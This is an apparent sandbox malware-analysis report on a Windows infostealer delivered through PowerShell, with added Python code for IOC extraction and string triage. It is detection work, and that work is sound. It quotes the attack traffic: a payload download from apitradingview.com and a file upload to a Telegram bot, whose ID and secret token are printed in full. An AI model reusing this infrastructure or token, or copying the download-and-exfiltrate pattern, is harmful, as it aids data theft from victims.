Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/TheDyer
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/freakcodingspot
Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/webster480
Source: DBp7mBJwqD.exe | String found in binary or memory: https://www.graalvm.org/
Source: DBp7mBJwqD.exe | String found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#
Source: DBp7mBJwqD.exe | String found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | HTTPS traffic detected: 86.104.15.60:443 -> 192.168.2.11:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.11:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49795 version: TLS 1.2
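The Networking entries above record four stages of the chain in clear text: the staging script fetched with the spoofed 'TradingView' user agent, the payload WDSecureUtilities.exe fetched with Invoke-WebRequest's default WindowsPowerShell user agent, a user-agent-less geolocation lookup against get.geojs.io, and a multipart POST of about 700 KB to the Telegram Bot API's sendDocument method under a fake Chrome user agent. As an added example (not from the report and not the sample's code), the following Python re-parses those four requests and produces the findings and IOCs an analyst would push into detection and blocking; the requests are reconstructed from the report's own lines (the report runs each request's headers together on one line), and the finding names are my own.

```python
import re

# Constructed input: the four HTTP requests listed in the report, headers re-split.
REQUESTS = [
    "GET /ermando1.txt HTTP/1.1\r\n"
    "User-Agent: TradingView\r\nHost: apitradingview.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /WDSecureUtilities.exe HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682\r\n"
    "Host: apitradingview.com\r\n\r\n",
    "GET /v1/ip/geo.json HTTP/1.1\r\nHost: get.geojs.io\r\nConnection: Keep-Alive\r\n\r\n",
    "POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) "
    "Chrome/49.0.1422.399 Safari/600\r\n"
    "Content-Type: multipart/form-data; boundary=----------------------------8dcfc823ae7a7a0\r\n"
    "Host: api.telegram.org\r\nContent-Length: 723700\r\nExpect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n\r\n",
]

# Telegram Bot API paths have the form /bot<numeric id>:<secret>/<method>.
TELEGRAM_BOT_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request head into method, path and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def triage(raw: str) -> dict:
    """Return one request's IOCs plus the findings a detection engineer would raise."""
    req = parse_request(raw)
    headers, path = req["headers"], req["path"]
    host = headers.get("host", "")
    ua = headers.get("user-agent")
    findings = []
    if ua is None:
        findings.append("no_user_agent")           # WinHTTP/.NET clients normally send one
    elif "WindowsPowerShell/" in ua:
        findings.append("powershell_user_agent")   # Invoke-WebRequest's default UA
    if path.lower().endswith(".exe"):
        findings.append("executable_download")
    result = {
        "url": host + path, "method": req["method"], "user_agent": ua,
        "content_length": int(headers.get("content-length", 0)), "findings": findings,
    }
    m = TELEGRAM_BOT_RE.match(path) if host == "api.telegram.org" else None
    if m:
        result["bot_id"], result["bot_token"], result["bot_method"] = m.groups()
        findings.append("telegram_bot_api")
        if m.group(3) in ("sendDocument", "sendPhoto", "sendVideo"):
            findings.append("telegram_file_upload")   # a file leaves the host, not a text
        if ua and ua.startswith("Mozilla/"):
            findings.append("browser_ua_on_bot_api")  # bots, not browsers, call this API
    return result


def summarize(raws) -> dict:
    """Collect network IOCs across all requests for blocking and hunting."""
    results = [triage(r) for r in raws]
    return {
        "hosts": {parse_request(r)["headers"].get("host") for r in raws},
        "urls": [r["url"] for r in results],
        "telegram_bots": {r["bot_id"]: r["bot_token"] for r in results if "bot_id" in r},
        "bytes_uploaded_to_telegram": sum(
            r["content_length"] for r in results if "telegram_bot_api" in r["findings"]),
        "findings": sorted({f for r in results for f in r["findings"]}),
    }


if __name__ == "__main__":
    for raw in REQUESTS:
        print(triage(raw))
    print(summarize(REQUESTS))
```

api.telegram.org and get.geojs.io are legitimate services, so the actionable indicators are the apitradingview.com host, the bot ID 8091768794 with its token, and the behavioural findings (a PowerShell user agent fetching an .exe, a browser user agent on a Bot API upload, a 723700-byte sendDocument). The two SID 2022930 alerts in the Suricata table above sit on a 172.202.163.200 flow that matches none of the DNS queries or HTTP transactions the report lists; confirm they belong to this chain before adding that address to a block list.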

            System Summary

            barindex
            Source: amsi64_8016.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 8016, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeJump to dropped file
            Source: amsi64_8016.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 8016, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: WDSecureUtilities_548.exe.8.dr, Yribalinuno.cs | Base64 encoded string: 'OBgWWgYCH09JDEQbRxUfC2I6MH1ZURdEFH03CQQdBgAMSjVQDRRWVRJFCQ==', 'Oy81fCAlTDYGGhkHBxQrBwYPWX8xPiFVPh4aVVsvNxwHCRxKEFE7PSwlMUY5AggNDRkKcAdRUVU='
            Source: WDSecureUtilities_548.exe.8.dr, Sevucohyher.cs | Base64 encoded string: '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', 'KwM4XioyLQYzMxNSMBlSBScuEVAvMi0SIDQ1LSAzJgkhLh4NLDULQSYzE1ImNABaISk4Xio3LhozIEUKMzgtGAoHLF42Qj4ZMCAMCgoXCAkhKTheOjcHQSYzE1ImNABaPzkaXioyLRI7MCJUMycfGAstL1IqNiZAIDAcVg04JRQnA0FPBzJZATMkTVUzJy0UDC0vQC01CwIgNC0BCDg1XgsiNA8vCFVFJRpFCiVBNQEyPysMOSklPiA0NQEgMyYJMSwSDSw1BC8jDjUBIDMmCSErFl4qMi0SIDQ1ASA3JTQiEzheKjItEiA0NQEqGSYJISk4XioyLRIgNhtfOSRXVzg+SQAzJVxMOSNEXzkkV1c4PkkAMyVcTD0yGCk6QSpXOD5JADMlXEw5I0RfOSRXVzg+SQAzJVxMOSNEXzkkV1c4PkkAMyVcTDkjRF8qGykBMT1MTDkmG0MgMBxWDTglFCcDQU8HMlkBMyRNCwodMQYJWDdPOTYAADNEOhELQzYlOVgRUQc1AxIIPyZWCjgqWCQTQAkvHF0ZJQ4AMzwoNT8kMjBOMhs2LD4jNjY7NQxcKwBJADMlXEw5I0RfOSRXVzg+SQAzJVxMOSNEXzkkV1c4PkkAMyVcTDkjRF85JFdXOD5JADMlXEw5I0RfOSRXVzg+SQAzJVxMOSNEXzkkV1c4PklyKicINzwcQSw9GwQGIS8/dDcyLjE9RyYgIDULOiEvI2k2GC4/PRsmNT1ANTg5WytpNh0HEjwxIjU8NV46Ojw0cjVBORI4IT4gIDVSPj4pO2oxJyIkPUdBMjolLSM6OTt+N0AlEj4iTTA8GSUsOVsrczdBWSEgNDI+OCYtITs/THEqIFFI', 'QjoRXA4UCAcGGRFGOgQCDwQPCxkxFBwaGwNeRjUMRwwRSjlOBhMfAQwFQF5ZUEFOKD4RXCcICQdkfXlsCRAHTkVKMGlZURdFFFcoThJBGjJBZ3MZTlE4FA5NVB1bDUcVWxd0M0NcTCUIBAcRBgIDHVJKAg0efGZVRFc3CQYbDgsbUFlCVgxhf0laVDEIHAsLHBlDGRhHEXhjFxQGZHocWRVnc0JbDGF/ZH00ABsVBgULBR1QDRYfBQYD', 'Mz83ci0+Ozs0R1pWR0BJXkU6EVwOFAgHBhkRSzsVFwEaHldDCgE=', 'ICE8YDw9IzYoOysrKDMvJyYvJWosNzgiKCUxOiQZBBwHGRZfFy07HAcTGxEaUCk6NCkMSxEUAgE/EgYVAB8J'
            Source: WDSecureUtilities_548.exe.8.dr, Gyvikecapit.cs | Base64 encoded string: 'ICE8YDwyOSc7MjoyNiU0Kzo2KlYFBRsUGxIoMAgcEQs0OQ1cAhw='
            Source: WDSecureUtilities_548.exe.8.dr, Ecunicihimi.cs | Base64 encoded string: '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'
            Source: WDSecureUtilities_548.exe.8.dr, Ulehivonobu.cs | Base64 encoded string: 'JQUDUA8dDVpcWURGQScOAAwFDkpDPzhVX1lFXUknKDleXlAZIgEcGQwgEQQiGRNBXlpLF1BGTF0iPyArJVxHAgEBHBkkFA8eBl5UJQECCAMNRU0ATUFCRF1FRkhaSV5OOwsfWBEYQ0NZRw=='
            Source: WDSecureUtilities_548.exe.8.dr, Vyxilyxiviz.cs | Base64 encoded string: 'Jh8UWwYDVlUSRwlrYyALDwsPEVYPFQkHU1cPVxR9bSsQGhBLAgUFGgdNVB1bDUgVWxd0MyEDAwIaEgZcSQtTE0gcAgweUUQOXwpd'
            Source: WDSecureUtilities_548.exe.8.dr, Dogacocaguc.cs | Base64 encoded string: 'Oy81fCAlTF9JMSYpJFAwBwZZS2YzAwMWDAQHRj44IjwtSilLDBIJBho+EEZUUBxeFQ=='
            Source: WDSecureUtilities_548.exe.8.dr, Rudupulygyt.cs | Base64 encoded string: 'QUo4SRMdCSIMFT8PHV9SXV9ESg9DWSc9PTo4SkkcDgUNSj5cABoDXEk='
            Source: WDSecureUtilities_548.exe.8.dr, Medecorysiz.cs | Base64 encoded string: 'PRoeSwIVCU9JABEEGh8EBQ0edDMgHgIbDBQADwYeXU49Gh5LAhUJeGMkEQVEJwIMOwUaUgYFQT4MDk5GDTcPAiEiN1EBKS4GMyQ2EwtCUgQyO0QEbns/EApaIwMLIwgNAw8NFDUUHgYAGBpcSUFUY2Jncw=='
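The "Base64 encoded string" entries above come from the decompiled .NET source of the dropped stealer (WDSecureUtilities_548.exe). Strings like these rarely decode to readable text; the first thing a practitioner checks is whether one Base64 decode is enough or whether a further obfuscation layer is present. The following script is an added example, not code from the Joe Sandbox report or from the sample. It decodes three of the strings copied verbatim from the report (Yribalinuno.cs, Gyvikecapit.cs, Rudupulygyt.cs), measures the printable fraction and entropy of the result, and finishes with a single-byte XOR probe. That probe is only a hypothesis check; the report does not state which scheme the sample uses, and the 0.95 printable threshold is an assumed triage cut-off.

```python
"""Triage the strings the report lists as "Base64 encoded string".

Added example; not code from the Joe Sandbox report or from the sample. It
checks whether a single Base64 decode yields readable text or something that
looks like a further encryption/obfuscation layer. The three inputs are
copied verbatim from the report (Yribalinuno.cs, Gyvikecapit.cs,
Rudupulygyt.cs). The single-byte XOR probe is a hypothesis check only; the
report does not say which scheme the sample uses.
"""
import base64
import binascii
import math
from typing import Dict, List, Optional, Tuple

# Copied from the report's "Base64 encoded string" entries.
REPORT_STRINGS: Dict[str, str] = {
    "Yribalinuno.cs": "OBgWWgYCH09JDEQbRxUfC2I6MH1ZURdEFH03CQQdBgAMSjVQDRRWVRJFCQ==",
    "Gyvikecapit.cs": "ICE8YDwyOSc7MjoyNiU0Kzo2KlYFBRsUGxIoMAgcEQs0OQ1cAhw=",
    "Rudupulygyt.cs": "QUo4SRMdCSIMFT8PHV9SXV9ESg9DWSc9PTo4SkkcDgUNSj5cABoDXEk=",
}

# Assumed triage cut-off: below this printable fraction we assume another layer.
TEXT_THRESHOLD = 0.95


def strict_b64decode(s: str) -> Optional[bytes]:
    """Decode only well-formed Base64 (standard alphabet, correct padding); None otherwise."""
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or tab/LF/CR."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D))
    return ok / len(data)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. For short inputs the ceiling is log2(len(data)), not 8,
    so compare against that ceiling rather than against 8."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def best_single_byte_xor(data: bytes) -> Tuple[int, float]:
    """Try every single-byte XOR key; return (key, printable_ratio) of the most
    text-like result. A low best score means single-byte XOR is not the scheme
    (a multi-byte key or a real cipher is in play)."""
    best_key, best_score = 0, -1.0
    for key in range(256):
        score = printable_ratio(bytes(b ^ key for b in data))
        if score > best_score:
            best_key, best_score = key, score
    return best_key, best_score


def triage(strings: Dict[str, str]) -> List[dict]:
    """One row per string: decoded length, printable ratio, entropy and verdict."""
    rows = []
    for name, s in strings.items():
        raw = strict_b64decode(s)
        if raw is None:
            rows.append({"name": name, "verdict": "not-base64"})
            continue
        ratio = printable_ratio(raw)
        key, xor_score = best_single_byte_xor(raw)
        rows.append({
            "name": name,
            "length": len(raw),
            "printable_ratio": round(ratio, 2),
            "entropy": round(shannon_entropy(raw), 2),
            "entropy_ceiling": round(math.log2(len(raw)), 2),
            "verdict": "text" if ratio >= TEXT_THRESHOLD else "further-layer",
            "xor1_best_key": key,
            "xor1_best_ratio": round(xor_score, 2),
        })
    return rows


if __name__ == "__main__":
    for row in triage(REPORT_STRINGS):
        print(row)
```

All three report strings decode cleanly (43, 38 and 41 bytes) but to mostly control bytes, so a single decode is not the end of the story; the real string table is only recoverable by locating the decoding routine in the decompiled source, which the report's Yara hits on the .cs files point at.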
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@15/9@4/3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | Mutant created: \Sessions\1\BaseNamedObjects\Idegyvenevikoguhucifavolomoboby
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlw22fuk.nbi.ps1
            Source: DBp7mBJwqD.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = <PID>, one query per PID, in the order observed: 3444, 1288, 2580, 3432, 3000, 2136, 6444, 408, 5148, 6440, 6008, 7300, 3420, 6436, 4276, 5568, 4704, 5996, 560, 2544, 5560, 6420, 5556, 7980, 5792, 7276, 3448, 6412, 3768, 7356, 1668, 2528, 5112, 5716, 1660, 1228, 5968, 6828, 5532
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = <PID>, one query per PID, in the order observed: 2944, 5528, 1216
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = <PID>, one query per PID, in the order observed: 2508, 352, 3796, 2932, 3360, 4652, 5944, 3788, 5080, 4648, 4212, 1624, 1192, 3716, 3776, 3692, 324, 6788, 1184, 2044, 3628, 2040, 744, 6776, 2132, 5480, 3808, 5908, 7200, 4556, 1164, 180, 4088, 2452, 2020, 6756, 2012, 1580, 5456, 496, 4160, 5452, 6740, 6736, 1132, 700, 1992, 1560, 2420, 5436, 7156, 516, 1120, 2412, 1980, 6720, 1544, 2612, 1972, 4988, 2832, 5416, 2828, 4120, 6272, 1528, 5836, 4540, 660, 1084, 652, 2804, 5388, 7972, 1504, 640, 6240, 2360, 2788, 5804, 4184, 1060, 772, 5904, 512, 4072, 620, 1048, 7512, 8016, 7076, 7068, 1032, 7060, 5332, 1452, 7224, 6184, 6772, 4888, 7040, 3960, 5744, 1864, 6604, 2724, 4900, 3708, 552, 1844, 4084, 980, 5288, 2268, 1836, 1404, 4848, 6140, 2560, 6568, 6996, 764, 92, 7252
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6940
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2236
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5252
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4388
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2660
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1364
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3948
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2652
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2220
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6528
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 492
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2644
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 916
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 484
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1772
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1340
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6080
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 476
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3492
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2628
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5644
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1332
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5640
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6068
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4772
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1636
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1752
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4336
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7180
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 856
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6092
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2172
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4756
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3892
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5612
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5180
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2592
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3020
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: DBp7mBJwqD.exeString found in binary or memory: <CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;Ljava/util/function/Supplier<TV;>;
            Source: DBp7mBJwqD.exeString found in binary or memory: <V:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/ClassLoaderValue<TV;>;TV;>;
            Source: DBp7mBJwqD.exeString found in binary or memory: t<V:Ljava/lang/Object;>Ljdk/internal/loader/AbstractClassLoaderValue<Ljdk/internal/loader/ClassLoaderValue<TV;>;TV;>;
            Source: DBp7mBJwqD.exeString found in binary or memory: Use '-XX:-InstallSegfaultHandler' to disable the segfault handler at run time and create a core dump instead.
            Source: DBp7mBJwqD.exeString found in binary or memory: nUse '-XX:-InstallSegfaultHandler' to disable the segfault handler at run time and create a core dump instead.
            Source: DBp7mBJwqD.exeString found in binary or memory: <CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;
            Source: DBp7mBJwqD.exeString found in binary or memory: d<CLV:Ljdk/internal/loader/AbstractClassLoaderValue<TCLV;TV;>;V:Ljava/lang/Object;>Ljava/lang/Object;
            Source: DBp7mBJwqD.exeString found in binary or memory: Rebuild with '-R:-InstallSegfaultHandler' to disable the handler permanently at build time.
            Source: DBp7mBJwqD.exeString found in binary or memory: [Rebuild with '-R:-InstallSegfaultHandler' to disable the handler permanently at build time.z
            Source: DBp7mBJwqD.exeString found in binary or memory: Ljdk/internal/loader/BootLoader;
            Source: DBp7mBJwqD.exeString found in binary or memory: Ljdk/internal/loader/BootLoader;
            Source: DBp7mBJwqD.exeString found in binary or memory: Africa/Addis_Ababa
            Source: DBp7mBJwqD.exeString found in binary or memory: Africa/Addis_AbabaV
            Source: DBp7mBJwqD.exeString found in binary or memory: E. Africa Standard Time:ET:Africa/Addis_Ababa:
            Source: unknownProcess created: C:\Users\user\Desktop\DBp7mBJwqD.exe "C:\Users\user\Desktop\DBp7mBJwqD.exe"
            Source: C:\Users\user\Desktop\DBp7mBJwqD.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
